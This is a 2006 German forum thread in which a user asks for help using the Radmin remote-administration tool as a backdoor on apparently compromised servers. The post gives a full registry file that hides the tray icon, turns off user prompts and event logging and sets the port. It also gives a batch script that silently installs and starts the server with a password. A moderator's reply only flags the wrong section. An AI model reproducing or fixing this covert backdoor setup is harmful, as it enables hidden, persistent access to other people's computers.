mit Radmin

Dieses Thema im Forum "Filesharing" wurde erstellt von BwTomekk, 9. Juli 2006 .

Schlagworte:
Status des Themas:
Es sind keine weiteren Antworten möglich.
  1. 9. Juli 2006
    Moin..

    Ich würde Gerne Radmin als Backdoor bei stro's benutzen.
    Leider weiss ich net welche filles ich da uppen muss.
    Bisher habe ich immer diese Files geuppt:
    r_server.exe
    raddrv.dll
    Reg.reg:
    Code:
    Windows Registry Editor Version 5.00
    
    [HKEY_CURRENT_USER\Software\RAdmin]
    
    [HKEY_CURRENT_USER\Software\RAdmin\v2.0]
    
    [HKEY_CURRENT_USER\Software\RAdmin\v2.0\Clients]
    "3"=hex:e0,93,04,00,0c,0c,00,50,00,00,05,00,00,00,64,00,00,00,00,00,00,00,01,\
     00,00,00,00,00,00,00,01,00,00,00,01,00,00,00,01,00,00,00,01,00,00,00,01,00,\
     00,00,01,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,38,32,2e,\
     33,38,2e,35,38,2e,31,34,34,00,00,00,00,1a,08,01,39,7c,c8,12,00,2e,00,d6,77,\
     1a,08,01,39,6b,00,10,01,af,cc,d6,77,28,08,58,00,07,00,00,00,11,00,00,00,04,\
     00,00,00,28,00,00,00,10,00,00,00,02,02,00,00,00,00,00,00,d0,fc,14,00,00,02,\
     00,00,03,00,00,00,03,00,00,00,48,00,00,00,14,00,00,00,11,00,00,00,38,32,2e,\
     33,38,2e,35,38,2e,31,34,34,00,00,00,00,1a,08,01,39,7c,c8,12,00,2e,00,d6,77,\
     1a,08,01,39,6b,00,10,01,af,cc,d6,77,28,08,58,00,07,00,00,00,11,00,00,00,04,\
     00,00,00,28,00,00,00,10,00,00,00,02,02,00,00,00,00,00,00,d0,fc,14,00,00,02,\
     00,00,03,00,00,00,03,00,00,00,48,00,00,00,14,00,00,00,11,00,00,00,00,00,00,\
     00,00,00,00,00,00,00,23,13,00,00,49,9c,00,00,03,00,00,00,00,00,00,00
    "4"=hex:e0,93,04,00,0c,0c,00,50,00,00,05,00,00,00,64,00,00,00,00,00,00,00,01,\
     00,00,00,00,00,00,00,01,00,00,00,01,00,00,00,01,00,00,00,01,00,00,00,01,00,\
     00,00,01,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,32,34,2e,\
     38,38,2e,31,30,36,2e,36,39,00,00,00,00,55,00,01,01,7c,c8,12,00,2e,00,d6,77,\
     55,00,01,01,6b,00,10,01,af,cc,d6,77,00,15,52,00,07,00,00,00,11,00,00,00,04,\
     00,00,00,28,00,00,00,10,00,00,00,02,02,00,00,00,00,00,00,18,f9,14,00,00,02,\
     00,00,03,00,00,00,03,00,00,00,48,00,00,00,14,00,00,00,11,00,00,00,32,34,2e,\
     38,38,2e,31,30,36,2e,36,39,00,00,00,00,55,00,01,01,7c,c8,12,00,2e,00,d6,77,\
     55,00,01,01,6b,00,10,01,af,cc,d6,77,00,15,52,00,07,00,00,00,11,00,00,00,04,\
     00,00,00,28,00,00,00,10,00,00,00,02,02,00,00,00,00,00,00,18,f9,14,00,00,02,\
     00,00,03,00,00,00,03,00,00,00,48,00,00,00,14,00,00,00,11,00,00,00,00,00,00,\
     00,00,00,00,00,00,00,23,13,00,00,4a,9c,00,00,04,00,00,00,00,00,00,00
    
    [HKEY_CURRENT_USER\Software\RAdmin\v2.0\Parameters]
    "ViewType"=hex:00,00,00,00
    "ConnectionMode"=hex:4b,9c,00,00
    "xsize"=hex:77,01,00,00
    "ysize"=hex:47,01,00,00
    "showbw"=hex:00,00,00,00
    "FileManLocalSort"=hex:02,00,00,00
    "FileManRemoteSort"=hex:02,00,00,00
    "FileManLocalViewMode"=hex:55,9c,00,00
    "FileManRemoteViewMode"=hex:55,9c,00,00
    "FileManxsize"=hex:84,02,00,00
    "FileManysize"=hex:e4,01,00,00
    
    [HKEY_LOCAL_MACHINE\SOFTWARE\RAdmin]
    
    [HKEY_LOCAL_MACHINE\SOFTWARE\RAdmin\v1.01]
    
    [HKEY_LOCAL_MACHINE\SOFTWARE\RAdmin\v1.01\ViewType]
    "Data"=hex:b8,9d,90,49,c1,fa,95,ab,24,d7,22,bf,bb,f6,01,39,12,6a,cd,f9,b9,2a,\
     13,33,77,16,0b,60,1e,04,92,ad,c9,66,ee,91,06,59,b8,6e,5f,af,4c,a1,e6,30,2b,\
     2e,3a,66,b9,c6,16,83,d8,84,58,bc,88,bc,7b,9d,4a,c2
    
    [HKEY_LOCAL_MACHINE\SYSTEM\RAdmin]
    
    [HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0]
    
    [HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server]
    
    [HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\iplist]
    
    [HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters]
    "NTAuthEnabled"=hex:00,00,00,00
    "Parameter"=hex:5d,da,9c,17,18,f7,af,b9,53,9d,c6,ed,2d,82,bd,71
    "Port"=hex:23,13,00,00
    "Timeout"=hex:0a,00,00,00
    "EnableLogFile"=hex:00,00,00,00
    "LogFilePath"="c:\\logfile.txt"
    "FilterIp"=hex:00,00,00,00
    "DisableTrayIcon"=hex:01,00,00,00
    "AutoAllow"=hex:00,00,00,00
    "AskUser"=hex:00,00,00,00
    "EnableEventLog"=hex:00,00,00,00
    Und starte sie mit einer BAT:
    Code:
    regedit /s radmin.reg
    r_server /install /silence
    r_server /pass:BLABLA /port:4899 /save /silence
    r_server /start /silence
    
    Aber ich bekomme immer ne fehlermeldung das eine DLL fehlt...

    Kann mir da einer weiterhelfen?
     
  2. 10. Juli 2006
    Zuletzt von einem Moderator bearbeitet: 13. April 2017
    [x] falsche section

    Lies Dir nochmals die Forenregeln bzw. die Undergroundregeln durch.
     
  3. Video Script

    Videos zum Themenbereich

    * gefundene Videos auf YouTube, anhand der Überschrift.